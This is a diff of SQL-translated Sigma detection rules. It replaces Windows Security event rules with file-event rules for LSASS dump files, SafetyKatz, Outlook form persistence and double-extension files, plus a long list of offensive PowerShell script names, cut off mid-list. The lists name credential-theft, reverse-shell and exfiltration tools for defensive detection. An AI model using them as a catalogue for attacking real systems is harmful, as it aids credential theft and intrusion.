"description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' 